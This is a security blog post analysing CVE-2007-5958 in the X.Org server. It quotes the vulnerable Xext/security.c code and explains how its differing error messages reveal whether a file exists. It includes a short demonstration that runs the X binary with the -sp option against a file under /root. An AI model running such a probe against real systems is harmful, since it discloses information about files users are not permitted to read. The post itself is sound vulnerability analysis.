xorl %eax, %eax

CVE-2007-5958: X.Org File Existence Disclosure

leave a comment »

On Tesday January 19 2008, Matthieu Herrb posted a security advisory on various mailing lists fod multiple vulnerabilities that had been found on X.Org server. One of the disclosed vulnerabilities was the following:

X.Org Xserver before 1.4.1 allows local users to determine the 
existence of arbitrary files via a filename argument in the -sp 
option to the X program, which produces different error messages 
depending on whether the filename exists.

The bug that makes this file disclosure is located at the Xext/security.c, at function SecurityLoadPropertyAccessList() which is located at line 1555.

static void
SecurityLoadPropertyAccessList(void)
{
    FILE *f;
    int lineNumber = 0;

    SecurityMaxPropertyName = 0;

    if (!SecurityPolicyFile)
    return;

    f = fopen(SecurityPolicyFile, "r");
    if (!f)
    {
    ErrorF("error opening security policy file %s\n",
           SecurityPolicyFile);
    return;
    }
            ...
    /* if first line, check version number */
    if (lineNumber == 1)
    {
        char *v = SecurityParseString(&p);
        if (strcmp(v, SECURITY_POLICY_FILE_VERSION) != 0)
        {
        ErrorF("%s: invalid security policy file version, ignoring file\n",
               SecurityPolicyFile);
        break;
        }
        validLine = TRUE;
    }

Now, you should most likely understand how this can be exploited to have a file existence disclosure. If the above function can’t read the file, which means that the file is not present, it prints out: “error opening security policy file“, on the other hand, if it was able to open the file but this wasn’t a policy file according to the version number, it prints out: “invalid security policy file version“. We can utilize this to check for files in directories that we don’t have read permissions.

This is an X.Org’s vulnerability, which means it works regardless of the underlying operating system, the vulnerable versions of X.org are on the default installation of numerous different operating systems such as: Ubuntu up to 7.10, SCO UnixWare up to 7.1.4, Sun Solaris up to 10, OpenBSD up to 4.2, Red Hat Enterprise up to 5, Apple MAC OSX up to 10.5.2 etc. I had a spare test-box with Ubuntu 6.10 Edgy Eft installed, so here is a sample test of this bug:

xorl@ubuntu:~$ uname -a
Linux ubuntu 2.6.17-10-generic #2 SMP Fri Oct 13 18:45:35 UTC 2006 i686 GNU/Linux
xorl@ubuntu:~$ ls /root/secretFile.txt
ls: /root/secretFile.txt: Permission denied

xorl@ubuntu:~$ X :1 -sp /root/secretFile.txt | grep secretFile
secretFile.txt: invalid security policy file version, ignoring file
xorl@ubuntu:~$

Of course you can automate this with a simple ten line shell script but I don’t find it really useful.

Written by xorl

January 2, 2009 at 22:58

Posted in bugs

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s